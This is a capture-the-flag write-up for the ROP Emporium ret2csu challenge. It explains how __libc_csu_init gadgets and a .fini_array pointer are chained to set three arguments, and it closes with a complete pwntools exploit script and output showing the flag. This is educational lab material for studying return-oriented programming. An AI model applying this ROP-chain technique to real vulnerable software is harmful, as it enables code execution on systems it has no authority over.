ROP Emporium ret2csu - (Almost) No Gadgets

After Fusion, I have been working through the x64 challenges of ROP Emporium to get a refresher on 64-bit exploitation, including calling conventions and other details. This challenge seemed interesting enough to deserve a short write-up.

context

The challenge is a 64-bit binary. I ran it on a VM with ASLR enabled. Here's the Fusion-style summary:

	Setting
Vulnerability Type	Stack
Position Independent Executable	No
Read only relocations	Partial
Non-Executable stack	Yes
Non-Executable heap	Yes
Address Space Layout Randomisation	Yes
Source Fortification	N/A

Analysis

The challenge's source code is not provided, but everything is compiled with debug symbols, so that's just as good. In this challenge we have the usual ROP Emporium vulnerable function pwnme and the target function ret2win, both of which live in a libret2csu.so file linked to the binary.
The goal is to call ret2win with the right arguments so we can get the flag. To save time, I will only discuss the code of ret2win. pwnme is a vanilla stack buffer overflow with nothing special; the only thing to note is that the ROP chain starts at offset 40 in the input.

ret2win source

Thanks to IDA:

void __fastcall __noreturn ret2win(__int64 a1, __int64 a2, __int64 a3)
{
  FILE *stream; // [rsp+20h] [rbp-10h]
  FILE *streama; // [rsp+20h] [rbp-10h]
  int i; // [rsp+2Ch] [rbp-4h]

  if ( a1 == 0xDEADBEEFDEADBEEFLL && a2 == 0xCAFEBABECAFEBABELL && a3 == 0xD00DF00DD00DF00DLL )
  {
    stream = fopen("encrypted_flag.dat", "r");
    if ( !stream )
    {
      puts("Failed to open encrypted_flag.dat");
      exit(1);
    }
    g_buf = (char *)malloc(0x21uLL);
    if ( !g_buf )
    {
      puts("Could not allocate memory");
      exit(1);
    }
    g_buf = fgets(g_buf, 33, stream);
    fclose(stream);
    streama = fopen("key.dat", "r");
    if ( !streama )
    {
      puts("Failed to open key.dat");
      exit(1);
    }
    for ( i = 0; i <= 31; ++i )
      g_buf[i] ^= fgetc(streama);
    *(_QWORD *)(g_buf + 4) ^= 0xDEADBEEFDEADBEEFLL;
    *(_QWORD *)(g_buf + 12) ^= 0xCAFEBABECAFEBABELL;
    *(_QWORD *)(g_buf + 20) ^= 0xD00DF00DD00DF00DLL;
    puts(g_buf);
    exit(0);
  }
  puts("Incorrect parameters");
  exit(1);
}

Simple enough: if we provide the right arguments, we get the flag. To do this we need to:
- place 0xDEADBEEFDEADBEEFLL in rdi
- place 0xCAFEBABECAFEBABELL in rsi
- place 0xD00DF00DD00DF00DLL in rdx
- call the function via its plt stub
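
As a side note, the decompiled body also shows why the arguments matter beyond the initial check: the same three constants are XORed into the decoded buffer. Here is a rough Python model of that decoding step, just to make the pointer arithmetic concrete. The names xor_qword and decode_flag are made up, passing the file contents in as bytes is my own simplification (the real code reads encrypted_flag.dat and key.dat), and I'm assuming little-endian qwords as on x86-64.

```python
# Rough model of the decoding in the decompiled ret2win (not the original source).
MAGIC = (0xDEADBEEFDEADBEEF, 0xCAFEBABECAFEBABE, 0xD00DF00DD00DF00D)


def xor_qword(buf: bytearray, offset: int, value: int) -> None:
    """XOR the little-endian 8-byte integer at buf[offset:offset+8] with value."""
    current = int.from_bytes(buf[offset:offset + 8], "little")
    buf[offset:offset + 8] = (current ^ value).to_bytes(8, "little")


def decode_flag(encrypted: bytes, key: bytes) -> bytes:
    """Hypothetical helper mirroring the byte loop and the three qword XORs."""
    buf = bytearray(encrypted[:32])
    for i in range(32):  # for ( i = 0; i <= 31; ++i )
        buf[i] ^= key[i]
    # *(_QWORD *)(g_buf + 4), (g_buf + 12) and (g_buf + 20)
    for offset, value in zip((4, 12, 20), MAGIC):
        xor_qword(buf, offset, value)
    return bytes(buf)


# XOR is its own inverse, so applying the helper twice gives back the input.
sample = bytes(range(32))
key = bytes([0x5A] * 32)
assert decode_flag(decode_flag(sample, key), key) == sample
```

The sample and key values are arbitrary test data, not anything taken from the challenge files.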

__libc_csu_init

The difficulty comes from the fact that we don't have many gadgets. We will only be using the gadgets in __libc_csu_init. Here's the disassembly:

pwndbg> disassemble __libc_csu_init
Dump of assembler code for function __libc_csu_init:
   0x0000000000400640 <+0>: push   r15
   0x0000000000400642 <+2>: push   r14
   0x0000000000400644 <+4>: mov    r15,rdx
   0x0000000000400647 <+7>: push   r13
   0x0000000000400649 <+9>: push   r12
   0x000000000040064b <+11>:    lea    r12,[rip+0x20079e]        # 0x600df0
   0x0000000000400652 <+18>:    push   rbp
   0x0000000000400653 <+19>:    lea    rbp,[rip+0x20079e]        # 0x600df8
   0x000000000040065a <+26>:    push   rbx
   0x000000000040065b <+27>:    mov    r13d,edi
   0x000000000040065e <+30>:    mov    r14,rsi
   0x0000000000400661 <+33>:    sub    rbp,r12
   0x0000000000400664 <+36>:    sub    rsp,0x8
   0x0000000000400668 <+40>:    sar    rbp,0x3
   0x000000000040066c <+44>:    call   0x4004d0 <_init>
   0x0000000000400671 <+49>:    test   rbp,rbp
   0x0000000000400674 <+52>:    je     0x400696 <__libc_csu_init+86>
   0x0000000000400676 <+54>:    xor    ebx,ebx
   0x0000000000400678 <+56>:    nop    DWORD PTR [rax+rax*1+0x0]
   0x0000000000400680 <+64>:    mov    rdx,r15
   0x0000000000400683 <+67>:    mov    rsi,r14
   0x0000000000400686 <+70>:    mov    edi,r13d
   0x0000000000400689 <+73>:    call   QWORD PTR [r12+rbx*8]
   0x000000000040068d <+77>:    add    rbx,0x1
   0x0000000000400691 <+81>:    cmp    rbp,rbx
   0x0000000000400694 <+84>:    jne    0x400680 <__libc_csu_init+64>
   0x0000000000400696 <+86>:    add    rsp,0x8
   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret
End of assembler dump.

This is awesome. There are two snippets of this that we will be exploiting:

   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret

Simple: this gives us control over all the listed registers. The problem is that we don't have control over rdx, which is crucial, as without it we cannot pass the third argument to ret2win and get the flag. The attentive reader might have spotted this:

   0x0000000000400680 <+64>:    mov    rdx,r15
   0x0000000000400683 <+67>:    mov    rsi,r14
   0x0000000000400686 <+70>:    mov    edi,r13d
   0x0000000000400689 <+73>:    call   QWORD PTR [r12+rbx*8]

This gives us control over rdx and rsi (since we control both r15 and r14), but there is yet another problem: the instruction mov edi,r13d only writes the lower half of rdi and zeroes out the rest, so we need another mechanism to set rdi before calling ret2win.
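
To make the truncation concrete, here is a tiny Python model of what mov edi,r13d does to a 64-bit value. The helper name is made up; the only fact it relies on is that writing a 32-bit register on x86-64 zero-extends into the full 64-bit register.

```python
MASK32 = 0xFFFFFFFF


def mov_edi_r13d(r13: int) -> int:
    """Model `mov edi, r13d`: rdi ends up with the low 32 bits of r13, upper bits zero."""
    return r13 & MASK32


arg1 = 0xDEADBEEFDEADBEEF
rdi = mov_edi_r13d(arg1)
print(hex(rdi))  # 0xdeadbeef, so the a1 == 0xDEADBEEFDEADBEEF check would fail
```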
We can control the call instruction because we control both registers used in it (r12 and rbx), but we need to know an address that points to an address that points to some code:

[addr1]->[addr2]->code (push rbp;mov ...)

More importantly, the code we jump to should ideally act like a ret instruction: it should not modify our registers, alter the stack layout, or exit. This rules out the only two GOT entries we have (ret2win and pwnme), as the former exits on failure and the latter does not preserve registers.
The only other functions we have a pointer-to-pointer for are the ones in the init and fini arrays (.init_array and .fini_array). These two are arrays of function pointers used by most C compiler-generated code (gcc, clang...) to provide initialization and finalization hooks, called respectively before main and at program exit. They usually point to dummy functions that do very little, which is exactly what we need.
I got the arrays' addresses with readelf:

readelf -a ./ret2csu | grep -iE 'init_array|fini_array'
  [18] .init_array INIT_ARRAY 0000000000600df0 00000df0
  [19] .fini_array FINI_ARRAY 0000000000600df8 00000df8
...

Looking at the function pointed to by the fini array, we have:

pwndbg> x/gx 0x000000000600df8
0x600df8:   0x00000000004005d0
pwndbg> x/10i 0x00000000004005d0
   0x4005d0 <__do_global_dtors_aux>:    cmp    BYTE PTR [rip+0x200a61],0x0        # 0x601038 <completed.7698>
   0x4005d7 <__do_global_dtors_aux+7>:  jne    0x4005f0 <__do_global_dtors_aux+32>
   0x4005d9 <__do_global_dtors_aux+9>:  push   rbp
   0x4005da <__do_global_dtors_aux+10>: mov    rbp,rsp
   0x4005dd <__do_global_dtors_aux+13>: call   0x400560 <deregister_tm_clones>
   0x4005e2 <__do_global_dtors_aux+18>: mov    BYTE PTR [rip+0x200a4f],0x1        # 0x601038 <completed.7698>
   0x4005e9 <__do_global_dtors_aux+25>: pop    rbp
   0x4005ea <__do_global_dtors_aux+26>: ret

I was concerned about the call to deregister_tm_clones, but it turned out to be harmless. This function satisfies all our needs: it behaves virtually like a ret instruction and lets us get past the call seamlessly, so we can deal with rdi afterward.
After the call, this can be used to set rdi:

   0x00000000004006a3: pop rdi; ret;
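
This gadget does not appear in the disassembly because it starts in the middle of pop r15. Here is a small Python sketch of why that works, assuming the standard x86-64 encodings 41 5f for pop r15, 5f for pop rdi and c3 for ret. The raw bytes are not shown in the dump above, so treat them as my assumption about this binary; the addresses come from the listing.

```python
# Bytes assumed at 0x4006a2: pop r15 (41 5f) followed by ret (c3).
BASE = 0x4006a2
CODE = bytes.fromhex("415fc3")

# Minimal lookup table covering only the encodings needed here.
ENCODINGS = {
    bytes.fromhex("415f"): "pop r15",
    bytes.fromhex("5f"): "pop rdi",
    bytes.fromhex("c3"): "ret",
}


def decode_from(address: int) -> list:
    """Decode instructions starting at `address` using the tiny table above."""
    offset = address - BASE
    out = []
    while offset < len(CODE):
        for raw, text in ENCODINGS.items():
            if CODE.startswith(raw, offset):
                out.append(text)
                offset += len(raw)
                break
        else:
            raise ValueError(f"unknown byte at offset {offset}")
    return out


print(decode_from(0x4006a2))  # ['pop r15', 'ret']
print(decode_from(0x4006a3))  # ['pop rdi', 'ret']
```

Skipping the one-byte 0x41 prefix is what turns pop r15 into pop rdi.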

exploit strategy

We'll do the following:
Call this chain and set the registers r13, r14, r15 to our arguments. Set rbx to the address of the pointer to our dummy function divided by 8, and r12 to the remainder of that division, so that r12 + rbx*8 equals that address. Set rbp to rbx + 1; we will get to why in a second:

   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret
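
The register values for this first gadget can be worked out with a couple of lines of Python. This is only a sketch: the helper name is mine, and 0x600df8 is the .fini_array address from the readelf output above. Any pair with r12 + rbx*8 equal to the slot works, so rbx = 0, rbp = 1, r12 = slot would be an equally valid choice as far as this arithmetic goes.

```python
FINI_SLOT = 0x600df8  # address that holds the pointer to the dummy function


def csu_registers(slot: int) -> dict:
    """Hypothetical helper: pick rbx, rbp, r12 so that r12 + rbx*8 == slot."""
    rbx, r12 = divmod(slot, 8)  # quotient goes to rbx, remainder to r12
    return {"rbx": rbx, "rbp": rbx + 1, "r12": r12}


regs = csu_registers(FINI_SLOT)
print({name: hex(value) for name, value in regs.items()})

# The call operand resolves to the slot, and the loop exits after one iteration.
assert regs["r12"] + regs["rbx"] * 8 == FINI_SLOT
assert regs["rbx"] + 1 == regs["rbp"]

# The simpler alternative satisfies the same two constraints.
alt = {"rbx": 0, "rbp": 1, "r12": FINI_SLOT}
assert alt["r12"] + alt["rbx"] * 8 == FINI_SLOT
```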

Call this to set rsi and rdx from our previously set r14 and r15:

   0x0000000000400680 <+64>:    mov    rdx,r15
   0x0000000000400683 <+67>:    mov    rsi,r14
   0x0000000000400686 <+70>:    mov    edi,r13d
   0x0000000000400689 <+73>:    call   QWORD PTR [r12+rbx*8]

After that, the call goes to the dummy function, but once it returns we have to go through this code before the next ret:

   0x000000000040068d <+77>:    add    rbx,0x1
   0x0000000000400691 <+81>:    cmp    rbp,rbx
   0x0000000000400694 <+84>:    jne    0x400680 <__libc_csu_init+64>
   0x0000000000400696 <+86>:    add    rsp,0x8
   0x000000000040069a <+90>:    pop    rbx
   0x000000000040069b <+91>:    pop    rbp
   0x000000000040069c <+92>:    pop    r12
   0x000000000040069e <+94>:    pop    r13
   0x00000000004006a0 <+96>:    pop    r14
   0x00000000004006a2 <+98>:    pop    r15
   0x00000000004006a4 <+100>:   ret

This is why we have to set rbp to rbx + 1: after add rbx,1, the cmp rbp,rbx; jne... pair must fall through instead of jumping back to the call gadget (an infinite loop here). Setting rbp equal to rbx + 1 is easily done with the first gadget.
Together, the add and the six pop instructions move rsp up by 7*8 bytes, so we need to account for that with padding in our ROP chain.
Finally, the chain uses pop rdi; ret to load the first argument and ends with the PLT address of ret2win, and we get the flag.
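
The 7*8 figure is just the add rsp,0x8 plus six pops, which can be double-checked like this. The sketch uses struct instead of pwntools so it runs anywhere; the filler value 0 is arbitrary, since the registers popped here are no longer needed.

```python
import struct

QWORD = 8
ADD_RSP = 0x8  # add rsp,0x8 skips one stack slot
POPPED = ["rbx", "rbp", "r12", "r13", "r14", "r15"]

padding_len = ADD_RSP + len(POPPED) * QWORD
padding = struct.pack("<Q", 0) * (padding_len // QWORD)

print(padding_len, padding_len // QWORD)  # 56 7
```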

model

[ overflow ]
     ↓
[ pop rbx rbp r12 r13 r14 r15 ] initializes rbx, rbp and r12-r15 for us
     ↓
[ call gadget ] sets second and third arg
     ↓
call [r12 + rbx*8] goes to dummy func and back
     ↓
[ pop chain again ] with dummy values
     ↓
[ pop rdi ; ret ] sets first arg
     ↓
[ ret2win ]
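
To sanity-check the model without touching the binary, here is a toy Python emulation of the three gadgets operating on a list of qwords. It is a sketch under assumptions, not a real emulator: the dummy function is modelled as a plain return that leaves rsi and rdx untouched, the function name emulate is made up, and the addresses are the ones quoted in this write-up.

```python
MASK32 = 0xFFFFFFFF
POP_GADGET, CALL_GADGET = 0x40069A, 0x400680
POP_RDI, RET2WIN_PLT = 0x4006A3, 0x400510
FINI_SLOT = 0x600DF8  # slot holding the pointer to the dummy function
ARG1, ARG2, ARG3 = 0xDEADBEEFDEADBEEF, 0xCAFEBABECAFEBABE, 0xD00DF00DD00DF00D
CSU_REGS = ("rbx", "rbp", "r12", "r13", "r14", "r15")


def emulate(chain):
    """Walk the chain and return the register state on arrival at ret2win."""
    regs, stack = {}, list(chain)

    def pop():
        return stack.pop(0)

    pc = pop()  # the overwritten return address
    while pc != RET2WIN_PLT:
        if pc == POP_GADGET:
            for name in CSU_REGS:
                regs[name] = pop()
        elif pc == CALL_GADGET:
            regs["rdx"] = regs["r15"]
            regs["rsi"] = regs["r14"]
            regs["rdi"] = regs["r13"] & MASK32  # mov edi,r13d
            # call [r12+rbx*8]: must hit the dummy, assumed to simply return
            assert regs["r12"] + regs["rbx"] * 8 == FINI_SLOT
            regs["rbx"] += 1
            assert regs["rbp"] == regs["rbx"], "jne would loop back"
            pop()  # add rsp,0x8
            for name in CSU_REGS:
                regs[name] = pop()
        elif pc == POP_RDI:
            regs["rdi"] = pop()
        else:
            raise ValueError(f"unexpected address {pc:#x}")
        pc = pop()  # the ret at the end of each gadget
    return regs


chain = [POP_GADGET, FINI_SLOT // 8, FINI_SLOT // 8 + 1, FINI_SLOT % 8,
         ARG1, ARG2, ARG3, CALL_GADGET] + [0] * 7 + [POP_RDI, ARG1, RET2WIN_PLT]
final = emulate(chain)
print({r: hex(final[r]) for r in ("rdi", "rsi", "rdx")})
```

Dropping the pop rdi step from the list leaves rdi at 0xdeadbeef, which is the truncation problem described earlier.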

The Exploit

The full exploit implementing the above:

from pwn import *

context.terminal = "kitty"

# the three magic arguments ret2win checks for
arg1 = 0xDEADBEEFDEADBEEF
arg2 = 0xCAFEBABECAFEBABE
arg3 = 0xD00DF00DD00DF00D

set_rdi = 0x00000000004006a3  # pop rdi; ret;

ret2csu_gadget = 0x000000000040069a  # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret;
ret2csu_call_gadget = 0x0000000000400680  # mov rdx,r15; mov rsi,r14; mov edi,r13d; call QWORD PTR [r12+rbx*8]

dummy = 0x0000000000600df8  # .fini_array slot, points to __do_global_dtors_aux
ret2win_plt = 0x400510
set_args_gadget = 0x000000000040093c  # pop rdi; pop rsi; pop rdx; ret; (not used by the chain below)

# values for the first gadget: r12 + rbx*8 must equal dummy
rbx = dummy // 8
rbp = rbx + 1  # so cmp rbp,rbx falls through after add rbx,1
r12 = dummy % 8
r13 = arg1  # only the low 32 bits reach rdi here, fixed later with set_rdi
r14 = arg2
r15 = arg3

ret2csu_chain = bytearray()
ret2csu_chain += p64(ret2csu_gadget)+p64(rbx)+p64(rbp)+p64(r12)+p64(r13)+p64(r14)+p64(r15)
ret2csu_chain += p64(ret2csu_call_gadget)
ret2csu_chain += 7*p64(0)  # padding for add rsp,8 and the six pops
ret2csu_chain += p64(set_rdi)+p64(arg1)
ret2csu_chain += p64(ret2win_plt)

p = process("./ret2csu")
p.send(40*b'A' + ret2csu_chain)  # the chain starts at offset 40
p.interactive()
exit()

Running this, we get:

❯ python ret2csu_exploit.py
[+] Starting local process './ret2csu': pid 23391
[*] Switching to interactive mode
[*] Process './ret2csu' stopped with exit code 0 (pid 23391)
ret2csu by ROP Emporium
x86_64

Check out https://ropemporium.com/challenge/ret2csu.html for information on how to solve this challenge.

> Thank you!
ROPE{a_placeholder_32byte_flag!}
[*] Got EOF while reading in interactive

and voila.